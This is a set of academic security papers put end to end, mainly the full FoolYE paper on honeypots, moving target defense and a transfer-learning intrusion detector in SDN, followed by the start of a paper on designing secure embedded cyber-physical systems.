Ef cient representation for formal veri cation of PLC programs * Vincent Gourcuff, Olivier De Smet and Jean-Marc Faure LURPA ENS de Cachan, 61 avenue du Pr es. Wilson, F-94235 Cachan Cedex, France Email: {gourcuff, de smet, faure }@lurpa.ens-cachan.fr
Fool_Your_Enemies_Enable_Cyber_Deception_and_Moving_Target_Defense_for_Intrusion_Detection_in_SDN.pdf
The adoption of deception technology constructed to throw off stealthy attackers from real assets and gather intelligence about how they operate is gaining ground in the network system. Also, some static honeypots are deployed in the network system to attract adversaries for avoiding them accessing the real targets. This leads to a disclosure of the existence of cyber traps in the network that do not fool skillful attackers. Meanwhile, there are many intrusion detection systems (IDS) lack the abnormal traffic s ample to obtain the knowledge of cyberattacks. Hence, it is vital to make honeypots more dynamically and give the material for harvesting useful threat intelligence for detector. Taking advantage of Software Defined Networking (SDN), cyber traps can be easily deployed when an intrusion detector triggers or actively laid in advance to mitigate the impact of adversaries into real assets. Instead of building IDS separately or blocking attacks pr omptly after an alert issued, in this paper, we utilize the strate gy of associating Cyber Deception, and Moving Target Defense (MTD) with IDS in SDN, named FoolYE (Fool your enemies) to slow a network intruder down and leverage the behaviors of adversaries on traps for feeding back detector awareness.
Fool Your Enemies: Enable Cyber Deception and Moving Target Defense for Intrusion Detection in SDN Phan The Duya,b, Hien Do Hoanga,b, Nghi Hoang Khoaa,b, Do Thi Thu Hiena,b, Van-Hau Phama,b aInformation Security Laboratory, University of Information Technology , Hochiminh City, Vietnam bVietnam National University Ho Chi Minh City , Hochiminh City, Vietnam Hochiminh City, Vietnam {duypt, hiendh, khoanh, hiendtt, haupv}@uit.edu.vn Keywords cyber deception, SDN, software defined networking, intrusion detection, honeypot I. INTRODUCTION Witnessing the explosion of the Internet of Things (IoTs) devices, network management encounters the problems of lacking flexibility, scalability, and automation. Under conventional network architecture, the performance of the network is downgraded if there is fluctuation in the presence and communication among many heterogeneous devices. To this end, Software Defined Networking (SDN) has been emerging with outstanding features to effectively manage a diversity of devices for edge-cloud computing by the centralized controller [1]. It enables the network administrator to observe the global view of the entire topology, automatically deploy a virtual network function, also promptly instruct a new security policy into IoT devices [2]. Clearly, SDN is a potential network paradigm for security orchestration in a large-scale network. When flocking into security sensors, the network traffic can be processed in a flexible way by installed rules in OpenFlow switches to intercept malicious actions. In The Art of War [3] - the most important and most famous military treatise in Asia for the last two thousand years, Sun Tzu observes, All warfare is based on deception. Hence, when we are able to attack, we must seem unable; when using our forces, we must appear inactive. Nowadays, 2500 years later since then, deception can be still efficiently applied in the war on cybercrime in addition to modern military operation. Deception is a great way to gain information about the opponent [4]. Though there are many security approaches like firewalls, intrusion detection system for recognizing and preventing rogue actors from accessing the critical resources, they are still not active defense solutions. Instead of waiting for attackers to intrude into the network system and then promptly block them, cyber deception technology, known as a next generation of honeypot, is adopted to pretend as real network resources to lure hackers. By this proactive strategy, cyber traps and decoy systems are deployed through some locations in the network to consume the effort and time of attackers. Besides, Moving Target Defense (MTD) known as an active defense principle keeps changing the attack surface of a protected asset through a dynamic shifting strategy, which can be handled by the administrator. In this way, the attack surface exposed to attackers appears chaotic and unstable by actively changing network configurations over time [5]. In different use cases, MTD can be applied to various assets attributes consisting of IP address, running services, protocol, topology, or port number, etc. [6]. Moreover, to mitigate the harm of attacks, IDS is considered as an essential means in the first round of defender system. By collecting malicious traces from various network segments, devices or security sensors, these systems do not only allow to recognize and disrupt the incoming actions from attackers, but also provide the capability of intrusion detection for the likely malicious traffic in the future. This is achieved by using machine learning (ML) for anomaly detection in addition to the signature-based approach. The complement of these two approaches can give a more effective defender system for the network which always suffers from sophisticated attacks by skilled hackers. Unfortunately, such ML-based IDSs need to be trained with a large volume of diverse attack records which are labeled from the analysis phase by security experts. The labeling task of the dataset re quires human effort and time 272022 21st International Symposium on Communications and Informa tion Technologies 978-1-6654-9851-7/22/$31.00 2022 IEEE2022 21st International Symposium on Communications and Information Technologies (ISCIT) | 978-1-6654-9851-7/22/$31.00 2022 IEEE | DOI: 10.1109/ISCIT55906.2022.9931208 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply. which is nearly impossible in the context of big data. The more and more sophisticated attacks emerge, the more burdened the task of gathering attack trails is. Additionally, some attack types are difficult to perform in the real-life scenario at the local network for collecting purpose due to the limitation of resources. Therefore, instead of blocking attackers rightly after they put a step into networks, we can continuously observe and extract their behaviors for training ML-based IDS. These decoy systems and cyber traps are free sources for defe nder systems to understand the hackers wher eas still making the enemy stuck in the matrix of vulnerabilities of fake assets with time- consuming and great efforts fo r the reconnaissance phase. This paper integrates the benefits of network programmability of SDN, cyber deception, MTD and deep transfer learning-based IDS to establish an active defense strategy for SDN. Our approach can create a more chaotic information and deceptive environment to mitigate the exposure of critical data in protected targets from attackers. Simultaneously, the malicious action of hackers gathered in deceptive objects can be used as high-quality and free-cost attack patterns for real-world attack detection. We organize the remainder of this paper as follows. Section II introduces the overview of deception technology and its support for IDS. The related works are also mentioned in this part. Section III outlines the overview of our approach, followed by the detailed architecture of the deception-enhanced framework for intrusion detection. We present the implementation and experiment results in Section IV . Finally, Section V concludes the paper with effective outcomes and discusses future directions. II. R ELATED LITERATURE Over the last decades, the concepts of deception witnessed rising popularity in information security with the concept of honeypot for deceiving would-be hackers into a trap. Cyber deception has been tremendously receiving the attention of researchers from academics an d industry [4]. It brings efficiency in early detecting attacks and gives more obstacles for attackers during their reconnaissance phase. In the work of He Wang [7], they used SDN for building a honeypot system to simulate network topologies and migrate traffic of attacks. Attackers are attracted to realis tic networks simulated by the SDN controller and attacks are redirected to honeypots. Honeypots are responsible for capturing the traffic of attacks for further analysis. Meanwhil e, Decepti-SCADA [8] used Docker to build honeypots to isolate the real system. This makes the honeypot system minimize the compromised ability and disqualify dependencies of cross-platform. This framework also developed modular architecture enabling adding new decoys easily. The web interface was built to improve users accessibility. Besides, Dahbul et al. [9] presented fingerprinting techniques of attackers to identify honeypots. By using several system configurations and customized scripts, they could improve the deceptive ability of honeypots to prevent honeypot detection from attackers. Howeve r, this research only focused on the layers of 3, 4, and 7. With the explosion of IoT, DDoS is the threat that deserves attention. IoT devices can exist exploitable vulnerabilities that are possible to be exploited to carry out DDoS attacks. Xupeng Luo et al. [10] proposed an SD N-based architecture of moving target defense to change attack targets. It helped to defend threats of scanning and mitigate DDoS attacks. A new attack was shown by Miao Du and Kun Wang [11] that could detect honeypots for disabling the protection of a system. To protect SDN from anti-honeypot attacks, they present a pseudo-honeypot strategy in SDN to face DDoS attacks in the IoT environment. The proposed strategy enables network administrators to hide network assets from scanners and defend against DDoS attacks in IoT. M eanwhile, Mengmeng et al. [12] combined cyber deception and moving target defense (MTD) to propose an intrusion prevention technique. SD-IoT networks implementing this technique can extend the lifetime of the system, maintain the availability of services, and increase tolerance to complex attacks. Additionally, Aris et al. [13] also formulated a proactive defense mechanism using MTD for Cyber-Physical Systems (CPS ). In their case, MTD can continuously alter the parameters of the system, while hindering the ability of adversaries to conduct successful reconnaissance to the network system. However, their mechanism lacks the flexibility in maximizing unpredictability and uncertainty due to the absence of SDN. Applying ML in IDS is a tren d in current research topics. Taking advantage of cyber-attacks as free labors to gather data for training machine learning based IDSs is a proactive defense suggested by Frederico Araujo et al. [14]. Adversarial interactions are selectively lengthened to maximize the collection of threat intelligence. More specifics, they introduced an interactive approach to improve web intrusion detection systems, called DeepDig. With network traffic and traces collected in traps, it built models of legitimate and malicious behaviors. This approach can enhance the automated feature extraction for IDS without additional developing effort. Motivated by this, our work designs the scheme of adaptive honeypot deployment and MTD in SDN to deceive attackers spending their time and resources on decoy systems. The leverage of SDN s programmability in our approach can help to enforce a more flexible deployment strategy of cyber traps corresponding to different network conditions than Decepti-SCADA and DeepDig. Also, the network flows extracted from the mirroring server can help to release the pressure of labeling attack data for training DL-based IDS models. Deep transfer learning for network flow-based IDS is another distinguished aspect of our work in comparison with DeepDig. III. M ETHODOLOGY This section gives the overview of the deception framework for IDS, named FoolYE , deployed to not only lure attackers targeting decoys for mitigating attack impacts but also leverage the free source of attack trails in detecting malicious attempts. As shown in Fig. 1 , the proposed architecture of the deception strategy associating intrusion detection is programmable by the essence of SDN. The controller can remotely observe network statistics and give relevant responses to the reconnaissance attacks. Any harmful or suspicious actions can be redirected to decoy target through instructing flow rules into OpenFlow switches. Specifically, many types of honeypots are prepared as a deception template in the Trap Inventory for easily deploying in network segments. 28 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply. Meanwhile, Security Orchestrator plays a role of opting the type of honeypot to be installed. It also determines the method of establishing cyber traps to mislead attackers into believing that the collected information from the scanning phase is real. Eventually, the attack trails or malicious action logged in the honeypot or decoy is gathered and utilized as a free source for maintaining the up-to-date intelligence in intrusion detection system (IDS). IDS is an engine implementing machine learning algorithms for detecting cyber threats. Extractor produces network flow features from data gathered from SDN controller and honeypots, then sends them to ML-based IDS for analysis. To prevent network reconnaissance from inside or outside, MTD is a plugin of the SDN controller, it is responsible for mapping a real IP address of a host to a virtual IP address. The virtual IP address is mutated in a period according to the idea of CONCEAL [15]. Fig. 1. FoolYE A deception-enhanced IDS in SDN-enabled network. Algorithm 1 gives the workflow of honeypot deployment of FoolYE, a flexible deception-supported IDS framework, aiming to create significant confusion in discovering and targeting cyber assets in SDN-aware networks. A. Intrusion Detection Engine Playing an important role in recognizing malicious traffic flow in the network, the intrusion detection engine leverages the ML algorithms to classify new incoming flows flocking into the operational network. Th is engine requires a massive number of traffic flow records to train before it can predict the attack label. These records can come from public datasets, or own-built honeypot systems deployed in the network. Regard to DL models used in ML-based IDS, we utilize two state-of -the-art models in image recognition, named ResNet50 and DenseNet161 on ImageNet dataset. The deep transfer learning strategy is ad opted in both models to reduce the training time of neural networks, as depicted in Fig. 2 . We use feature extraction strategy as a transfer learning technique to leverage the model knowledge of previous domain in a new one. The last fully connected (FC) layer of models is replaced with the layer including 2 classes (normal and abnormal) instead of 1000 classes in ImageNet. The hyperparameters of fully connected layers in ResNet50 and DenseNet161 are kept unchanged during the training phase. Following that, the training phase is conducted by using random hyperparameters on the new last layer to update them according to the intrusion detection dataset. Fig. 2. Training detector by deep transfer learning on ResNet50 model. Based on recommendation of a flow-based IDS research [16] on CICIDS2017 dataset [17] , we choose 7 of 80 flow features in CICIDS2018 dataset [18] for ML-based IDS because these SDN flow features can be easily obtained by controller while sharing the same descriptions with the CICIDS2017 dataset [17]. These features are destination port, flow duration, fwd packet length mean, flow bytes/s, flow packet/s, flow IAT mean, fwd packets/s. Labels of the dataset are converted into two types: value 0 is benign and 1 is likely an attack. Values of the flow features in the dataset have several types as integer, st ring, float. The min-max normalization is performed to normalize them into the domain of [0, 1]. A new value ( xnew ) converted into an integer by formula 2 xnew*10. After that, the task of converting network records into images is conducted to feed into the input of two mentioned DL models. To achieve this, we utilize the method proposed by Zhipeng Li [19] to transform each integer value to a corresponding binary value. This method ensures that all values only fall into the range from 0 to 255 to be mapped into an image pixel. Besides, the output of the method from [19] on each feature value is a binary number with 8 bits. Next, 8-bit elements are concatenated into a single bit array with the length Algorithm 1 Trap deployment workflow of FoolYE Input: inventory : list of honeypot images in Trap Inventory templates : honeypot image to establish mtdIPPool : a list of fake IPs for moving target defense deployMode: the mode of deploying honeypots period: period to change traps Output: traps: list of honeypots is deployed 1: Initialize timer 2: # Initialize traps according to the deployMode traps inventory .create (templates ) 3: if (timer mod period == 0) 4: traps IP mutation on topology ( mtdIPPool ) 5: if (deployMode == MOVING) 6: # Change traps to other types from inventory and templates traps changeType( inventory,templates) 7: return traps 29 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply. of larray. To simplify the process of image conversion, we aim to get a square RGB image to represent for a flow-based IDS. Relied on the characteristics of a color image, the larray value can be used to determine the size s of this target image, as in (1). larray=3 s2 (1) Moreover, in case s receives a decimal value, 0 bits will be added to the end of the bit array to make s come to an integer value. This new array is then di vided into 3 sub-arrays with the same length. The length of s2 allows them to be transformed to corresponding 2-dimension arrays as color layers in RGB image. B. Cyber Deception, Trap Inventory and Security Orchestrator One of the main objectives for cyber deception is to cover the identity of the cyber assets. Thus, in FoolYE, we use various honeypots to take attacker far away from critical resources and detect malicious actions early in the cybersecurity kill chain. For automation of deploying decoys, FoolYE is supported by two modules of Trap Inventory and Security Orchestrator . Firstly, Trap Inventory stores and manages traps packaged as docker images. These decoy objects are deployed in form of docker container running honeypots. Meanwhile, Security Orchestrator is built for deploying honeypots or decoys and observing malicious action in these cyber traps. At the machine assi gned as a decoy, a honeypot image from Docker Registry [20] is pulled and deployed into hosts randomly by Ansible through SSH connection. This approach can facilitate the flexibility for a cyber deception system. We can perform tasks of deploying or revoking traps, then run on other decoy hosts. We design two types of mechanisms called fixed trap and moving trap. x Fixed trap: Honeypots are permanently deployed in a host in the network. We can choose a type of honeypots or use the random mechanism to deploy cyber traps. x Moving trap: Honeypots are deployed automatically in the network. After a certain time, FoolYE framework conducts a moving strategy to renew decoys by changing honeypot type or deployment platform (hosts). C. Moving Target Defense Moving target defense (MTD), one of the game-changing themes to alter the asymmetric situation between attacks and defenses in cybersecurity, facilitates proactive defense strategies that are diverse and that continually shift attack surfaces in some fashion and change over time. In addition to cyber deception, we also apply MTD strategy aiming to impede adversaries from targeting and executing successful attacks by increasing complexity, chaos, and co st for attackers. It can help to limit the exposure of vulnerabilities and opportunities for attack, deceive adversaries in real time. Specifically, there is a list of available IP addresses in the network topology that are mutated by virtual IP addresses by MTD module. The MTD-based proactive technique is integrated with SDN controller to help the switch understand what virtual IP addresses implies to which real ones. The mapping process between real and virtual IP address is repeatedly conducted after a certain period of x seconds. The changes in IP leads to invalidate the reconnaissance information for attackers. IV. E XPERIMENTS This section provides the de tails of SDN testbed settings, followed by the experiment results through different scenarios. A. Training ML-Based IDS To train the ML-based IDS, we utilize a physical machine with configuration of RAM 64GB, CPU Intel i7 6700HQ, 03xGPU GTX 1050ti 4GB. We choose CICIDS2018 dataset [18] with DDoS attacks to evaluate the performance of ML-based IDS. Specifically, four .CSV files in this dataset including Thurs-15-02-2018, Fri-16-02-2018, Tues-20-02-2018, Wed-21-02-2018 are combined, then split into train set and test set with ratio of 80% and 20% respectively. Two outstanding neural networks consisting of ResNet50 and DenseNet161 are deployed by Pytorch [21]. Following that, they are trained with 10 epochs, the learning rate of 0.001, cross entropy as loss function, and Adam optimizer. The training results after 10 epochs are shown in the Table I . In the future, collected malicious activities of adversaries from decoys can be utilized to train and update the knowledge of IDS about the real-world attack patterns in the network. B. Experiment Settings In the experimental environment, we use 2 virtual machines (VM) running Ubuntu 18.04 to construct an SDN testbed and other components. Table II illustrates the configuration of components in our framework. Initially, the SDN testbed, as depicted in Fig. 3 , is built with Ryu controller [22] and Containernet [23]. Containernet is a Mininet version [24] allowing Docker containers to be emulated as hosts in SDN-enabled networks. The network topology comprises 4 OpenFlow-supported switches, known as OpenvSwitch, connecting with 8, 12, 16 hosts in different experimental testing. In terms of cyber deception, we use 3 types of honeypots, namely Opencanary [25], Cowrie [26], Dionaea [27] to deploy decoy objects in the network. They are packed in Docker images, shown in Table III supporting easy installation as a container in decoy zone later. Note that, despite of just only deploying 3 types of honeypots in this experiment, hundreds of other decoy Docker images can be created. We use Playbook in Ansible [28] to deploy automatic traps with two mechanisms of fixed trap and moving trap. In the fixed type, administrator chooses a honeypot to be installed at a specific location for luring attackers until the administrator turns off or changes them to other types. On the contrary, in the moving strategy, various types of traps are selected to automatically deploy on different deceptive hosts. Then, they are continually changing to another type after a scheduled period. TABLE I. RESULTS OF DEEP TRANSFER LEARNING MODELS ON CICIDS2018 Model Performance on Test Set Accuracy (%) F1-score (%) 30 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply. Model Performance on Test Set Accuracy (%) F1-score (%) ResNet50 99.79 99.8 DenseNet161 99.44 99.5 TABLE II. EXPERIMENTAL SETTINGS ON VIRTUAL MACHINES # VM 1 VM 2 Hardware configuration Intel (R) Xeon(R) CPU E5- 2660 2.0GHz, 160GB HDD, 16GB RAM Intel (R) Xeon(R) CPU E5- 2660 2.0GHz, 100GB HDD, 4GB RAM Application Ryu controller, MTD module, RabbitMQ, ML-based IDS Containernet, Feature extraction module, Ansible, Snort3 Fig. 3. Experimental SDN-enabled network testbed. For ML-based IDS, ResNet50 and DenseNet161 are used as the prediction models. Each of them is loaded in the IDS programmed by Python language. The network traffic is captured and extracted by TCPDump_and_CICFlowMeter tool [29] and sent asynchronously by RabbitMQ [30] to ML-based IDS for getting the classification result. In addition, MTD is programmed as a module of SDN controller. Therein, real IP addresses are available to hosts but hidden to outsider attacker to avoid reconnaissance attacks from the outside. In contrast, a virtual IP address is an IP representing host, which will be changed continuously. To meet the demand for monitoring and giving notice of the cyber deception system, we utilize Snort [31] in the host VM playing the role of Security Orchestrator. Snort rules are installed to monitor network traffic sent from cyber deception system, namely DDoS attack and SSH connection attempts. Any security events violating the security policy established by Snort rules will be produce an alert for network security administrator. TABLE III. COMPRESSED SIZE AND PULLED SIZE OF THE IMAGES CONTAINING THE TRAPS # Opencanary Cowrie Dionaea Compressed size 206.67 MB 114.66 MB 59.87 MB Pulled size 632 MB 432 MB 194 MB C. Experiment Results To evaluate the built-in the ability of identifying attacks, we perform a DoS attack on a Web server with service port 80, by sending 100 HTTP requests per second. For the assessment of attack detection capabilities, we use statistical methods. For every 100 records received, the ML-based IDS calculates the percentage of attack flows in the total network traffic. There are approximately 60% of attack flows can be detected by both ResNet50 and DenseNet161 model in this test. Meanwhile, the average time of flow record prediction by ResNet50 and DenseNet161 is around 1.93 records/s, and 2.12 records/s, respectively. The number of records in this evaluation per second will be proportional to the hardware configuration because the recognition speed of the model is greatly affected by the CPU, RAM, or GPU of the VM. When it comes to deployment time of traps, we take 30 measurements and record the time in seconds. The experiments are performed with 2, 3, and 4 traps. In each group of traps, results of the experiments are shown in Table IV . Time consumption of trap deployment includes time waste of host selection, pulling honeypot images from Docker registry (storage), starting containers for all honeypots in the group. To show the effectiveness of network monitoring on deployed honeypots, we conduct a test case on Opencanary trap by logging and analyzing attacker s actions. An adversary performs a scanning attack and getting active services running on a specific host. Following that, they attempt to explore and exploit the fake target built by Opencanary. Such trails coming from decoys are monitored and shown in the real-time under the view of Security Orchestrator machine, as depicted in Fig. 4. TABLE IV. TIME CONSUMPTION OF HONEYPOT DEPLOYMENT IN 30 EXPERIMENTS Number of honeypots Maximum time (s) Minimum time (s) Average time (s) 2 200.2 136.8 163.2 3 330.5 159.9 236.7 4 468.6 166.1 268.2 Fig. 4. Log monitoring from Opencanary honeypot. TABLE V. TIME CONSUMPTION AND THE NUMBER OF DISCOVERED HOSTS ON SCANNING PROCESS USING MTD AND NON-MTD Total hosts MTD Non-MTD Scanning Time (s) Discovered hosts Scanning Time (s) Discovered hosts 8 5524 7 969 8 12 6948 9 1059 12 16 9837 13 1206 16 31 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply. Regarding the performance of MTD mechanism on changing attack surfaces, we use nmap tool [32] to scan the network in both cases of MTD and non-MTD integration. The results, as illustrated in Table V , prove that by forcing MTD strategy, it does not take a long time for attacker to finish reconnaissance attacks but also miss useful network information. V. C ONCLUSION AND FUTURE WORKS To improve the effectiveness of cyber defense in SDN- enabled network, we introduce a deception-enhanced intrusion detection system, named FoolYE for deploying traps and decoys to lure attackers. By leveraging the essence of SDN, these traps are continually created, monitored, and easily changed to create more deceptive attack surfaces. With the matrix of decoys and Moving Target Defense, it takes network intruder to spend more time and effort in counterfeit assets while early giving security analysts about the attacker presence in the network. Furthermore, behaviors of adversaries in the decoy systems are collected for training IDS to meet requirements of detecting skillful cyberattacks in the real-world scenarios. In the future, we intend to utilize the honey patches which are real assets turning out the rich-environment trap. Next, the evaluation from red teams is considered to further validate the feasibility of our framework in the real-world scenarios. A CKNOWLEDGMENT This research is funded by Vietnam National University HoChiMinh City (VNU-HCM) under grant number DS2022- 26-02. Phan The Duy was funded by Vingroup JSC and supported by the Domestic Master, PhD Scholarship Programme of Vingroup Innovation Foundation (VINIF), Institute of Big Data, code VINIF.2021.TS.152. R EFERENCES [1] P. P. Ray, N. Kumar, "SDN/NFV architectures for edge-cloud oriented IoT: A systematic review," Computer Communications, vol. 169, 2021. [2] I. Alam, K. Sharif, F. Li, Z. Latif, M. M. Karim, S. Biswa, B. Nour and Y. Wang, "A Survey of Network Virtualization Techniques for Internet of Things Using SDN and NFV," ACM Computing Surveys, 2020. [3] W. Sun, "The Art of War," in Me ns sana, Knaur, M nchen., 2001. [4] D. Fraunholz, S. D. Anton, C. Lipps, D. Reti, D. Krohmer, F. Pohl, M. Tammen and H. D. Schotten, "Demy stifying Deception Technology:A Survey," in arXiv:1804.06196, 2018. [5] G.-l. Cai, B.-s. Wang, W. Hu and T.-z. Wang, "Moving target defense: state of the art and characteristics., " Frontiers Inf Techno l Electronic Eng, vol. 17, p. 1122 1153 , 2016. [6] S. Sengupta, A. Chowdhary, A. Sabur, A. Alshamrani, D. Huang and S. Kambhampati, "A Survey of Moving Target Defenses for Network Security," IEEE Communications Su rveys & Tutorials, vol. 22, 2020. [7] H. Wang and B. Wu, "SDN-based hy brid honeypot for attack capture," in 2019 IEEE 3rd ITNEC, 2019, . [8] N. Cifranic, R. A. Hallman, J. Rome ro-Mariona, B. Souza, T. Calton and Giancarlo Coca, "Decepti-SCADA: A cyber deception framework for active defense of networked critical infr astructures," Internet of Things, vol. 12, 2020. [9] R. Dahbul, C. Lim and J. Purnama, "Enhancing Honeypot Deception Capability Through Network Service Fingerprinting," Journal of Physics Conference Series, 2017. [10] X. Luo, Q. Yan, M. Wang and W. Huang, "Using MTD and SDN-based Honeypots to Defend DDoS Attacks in IoT," in ComComAp, 2019. [11] D. Miao and W. Kun, "An SDN-Ena bled Pseudo-Honeypot Strategy for Distributed Denial of Service Attacks in Industrial Internet of Things," IEEE Transactions on Industrial In formatics , vol. 16, 2019. [12] M. Ge, J.-H. Cho, D. S. Kim, G. Dixit and I.-R. Chen, "Proactive Defense for Internet-of-Things: Integrating Moving Target Defense with Cyberdeception," in arXiv prepr int arXiv:2005.04220, 2020. [13] A. Kanellopoulos and K. G. Vam voudakis, "A Moving Target Defense Control Framework for Cyber-Physi cal Systems," IEEE Transactions on Automatic Control , vol. 65, no. 3, pp. 1029 - 1043, 2020. [14] A. Frederico, A. Gbadebo, A.-N. Khaled, G. Yang, H. K. W., K. Latifur, "Improving intrusion detectors by cr ook-sourcing," in ACSAC, 2019. [15] Q. Duan, E. Al-Shaer, M. Islam and H. Jafarian, "CONCEAL: A Strategy Composition for Resilient Cyber Deception-Framework, Metrics and Deployment," in 2018 IEEE CNS, Beijing, China, 2018. [16] T. Tang, D. McLernon, L. Mhamdi, S. Zaidi and M. Ghogho, "Intrusion Detection in SDN-Based Networks: Deep Recurrent Neural Network Approach," in In: Alazab M., Tang M. (eds) Deep Learning Applications for Cyber Security. Advanced Sciences and Technologies for Security Applications, Springer, Cham, 2019. [17] A. H. L. Iman Sharafaldin, "A Detailed Analy sis of the CICIDS2017 Data Set," in Communications in Computer and Information Science, vol. 977, CCIS, 2019. [18] I. Sharafaldin, A. H. Lashkari and A. A. Ghorbani, "Toward Generating a New Intrusion Detection Dataset and Intrusion Traffic Characterization," in 4th ICISSP, Portugal, 2018. [19] Z. Li, Z. Qin, K. Huang, X. Yang and S. Ye, "Intrusion Detection Using Convolutional Neural Networks for Representation Learning," in Lecture Notes in Computer Science, vol. 10638, LNCS. [20] "Docker Registry," [Online]. Available: https://docs.docker.com/registry/. [21] "PyTorch," [Online]. Availab le: https://pytorch.org/. [22] "Ryu SDN Controller," [Online]. Available: https://ryu-sdn.org/. [23] "Containernet: Use Docker containers as hosts in Mininet emulations.," [Online]. Available: https://co ntainernet.github.io/. [24] "An Instant Virtual Network on your Laptop (or other PC)," Mininet, [Online]. Available: http://mininet.org/. [25] "OpenCanary," [Online]. Available: https://opencanary.readthedocs.io/en/latest/. [26] "Cowrie," [Online]. Available: https://cowrie.readthedocs.io/en/latest/index.html. [27] "Dionaea honeypot," [Online]. Available: https://dionaea.readthedocs.io/. [28] "Playbook in Ansible," [Online]. Available: https://docs.ansible.com/ansible/lates t/user_guide/playbooks_intro.html. [29] "TCPDUMP_and_CICFlowMeter," [Online]. Available: https://github.com/iPAS/TCPDUMP_and_CICFlowMeter. [30] "RabbitMQ," RabbitMQ || VMWare, Dec 2020. [Online]. Available: https://www.rabbitmq.com/. [31] "Snort - Network Intrusion Detection & Prevention System," [Online]. Available: https://www.snort.org/. [32] "Nmap: the Network Mapper - Free Security Scanner," [Online]. Available: https://nmap.org/. 32 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:15 UTC from IEEE Xplore. Restrictions apply.
Design_lifecycle_for_secure_cyber-physical_systems_based_on_embedded_devices.pdf
The paper is devoted to the issues of design of secure cyber-physical systems based on embedded devices. It aims to develop a generaliz ed approach to the design of secure systems based on embedded devices. Current approaches to design secure software and embedded devices are analyzed. The design lifecycle for secure embedded devices system is proposed. Advantages and disadvantages of the approach are analyzed. The correctness of design lifecycle for secure embedded devices systems is validated by its use in the development of the integrated cyber- physical security system.
The 9th IEEE International Conference on Intelligent Data Acquisition and Advanced Computing Systems: Technology and Applications 21-23 September, 2017, Bucharest, Romania Design Lifecycle for Secure Cyber-Physical Systems based on Embedded Devices Dmitry Levshun, Andrey Chechulin, and Igor Kotenko St. Petersburg Institute for Informatics and Auto mation of Russian Academy of Sciences (SPIIRAS) 39, 14th Liniya, St. Petersburg, Russia, St. Petersburg National Research University of Informa tion Technologies, Mechanics and Optics (ITMO University), 49, Kronverkskiy prospekt, Saint-Petersburg, Russia {levshun, chechulin, ivkote}@comsec.spb.ru, http://comsec.spb.ru Keywords cyber-physical systems, embedded devices, design of secure cyber-physical systems, security of embedded devices systems. I. INTRODUCTION Nowadays the integrated approach to providing cyber- physical security of critical infrastructures is widely spread. This approach is to combine heterogeneous sources of events of the physical and cyber levels within one system, as well as to ensure the resilience of such systems to attacks on them [1]. This approach allows to detect security incidents, scen arios of attacks, and provide anomalous activity detection, which previously was possible only at the stage of investigation, as well as to respond to them in real time. In addition, there are national and international standards for the development of secure software, as well as solutions from leading companies in the domain of information technology. Besides that, the frameworks for design of the software architecture taking into account the need to ensure its security are widely spread. We should note that the functionality of the embedded devices is determined not only by software but also by hardware. Connection between the software part of the device, on the one hand, and hardware, on the other, lead to the presence of additional constraints which have significant effect on the design process of such devices. This means that existing solutions to build secure software are not applicable to the design of secure systems based on embedded devices in full, and therefore there is necessity of their revision. Also in practice the component approach to development of embedded devices is widely used. It is implemented, for example, within the context of the Arduino, Raspberry Pi, Beaglebone, and Intel Galileo. For this approach there are the techniques of designing secure embedded devices, which allow at the design stage of an embedded device to identify the list of possible attacks, which may affect the devi ce, in accordance with the selected model of the intrud er, and used software and hardware components [2]. However, the use of such methods and further consolidation within a single system, combining multiple secure embedded devices, does not allow to develop a secure system due to the need of considering the emergent properties of the system. This means that these techniques are also not applicable to the task fully and there is a need of their revision. In addition, in recent years, the research in the field of methodologies for design and verification of networked embedded systems [3] are widely spread. The main purpose of these techniques is to provide developers of networked embedded systems with information about the applicability of certain in terfaces and data transfer protocols to ensure appropriate level of reliability of the final system. The security of embedded devices is not an immediate goal of these methods, however, some aspects of security are considered when selecting interfaces and data transfer protocols. It is also important to note that methods of this type can en sure the reliability only for isolated embedded devices, without considering their interaction with remote servers, workstations, web services, etc. This means that the methodology of design and verification for networked embedded systems is not applicable to the task of providing security of not isolated systems based on embedded devices, and therefore also needs to be extended. To summarize, it is important to note that at the moment there is no single generalized approach for solving the problem of designing secure systems based on embedded devices; and existing solutions have drawbacks and need improvement. This paper aims to develop a generalized approach to the design of secure systems based on embedded devices. The main contribution of this 978-1-5386-0697-1/17/$31.00 2017 IEEE 277 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:12 UTC from IEEE Xplore. Restrictions apply. paper is to develop a unified technique to design secure systems based on embedded devices, taking into account the emergent properties of the protected system. The novelty of the proposed approach is in combination of solutions on the development of secure software with the techniques for design of secure embedded devices in a single design procedure. Thus as emergent properties are considered the properties that appear in the system based on interfaces and data transmission channels between elements of the system. The paper presents main elem ents of the research and development performed; its structure is organized as follows. Second section discusses the main results of the previously fulfilled relevant research. Third section provides a general description of the developed approach. The correctness of the design life cycle for embedded devices system is verified by its use in the development of an integrated cyber-physical security system specified in forth section . Advantages and disadvantages of the approach are analyzed in fifth section . The main conclusions and further research directions are discussed in sixth section . II. R ELATED WORK As one of the possible solutions for developing secure software, let us consider a solution from Microsoft, namely the Microsoft Secur ity Development Lifecycle (Microsoft SDL) [4]. The a pproach of the company is divided into seven key se quential phases: training, requirements, design, implementation, verification, release and response. The fundamental phases from the point of view of the development of a secure system based on embedded devices are requirements and design. This is due to the fact that the immediate task of design technique is providing input on security requirements, quality gates/bug bars, security and privacy risk assessments on the phase of requirements. In addition, an equally important goal of the technique is providing input data on design requirements and threat model for the design phase. Another possible solution for developing secure software is the solution from Cisco Cisco Secure Development Lifecycle (Cisco SDL) [5]. The company's approach consists of six sequential phases: product security requirements, third party security, secure design, secure coding, static analysis, vulnerability testing. From the point of view of the development of a secure system based on embedded devices, the most important phases are product security requirements and secure design. So, on the secure requirement phase the gap analysis is done, whose main task is to identify the necessary changes in the system to achieve the safe state. And in the phase of the secure design the process of threat modeling is done to make assumptions for possible threats and ways to mitigate them. In addition, one of the interesting features of SDL Cisco compared to Microsoft SDL is a third party security phase, aimed 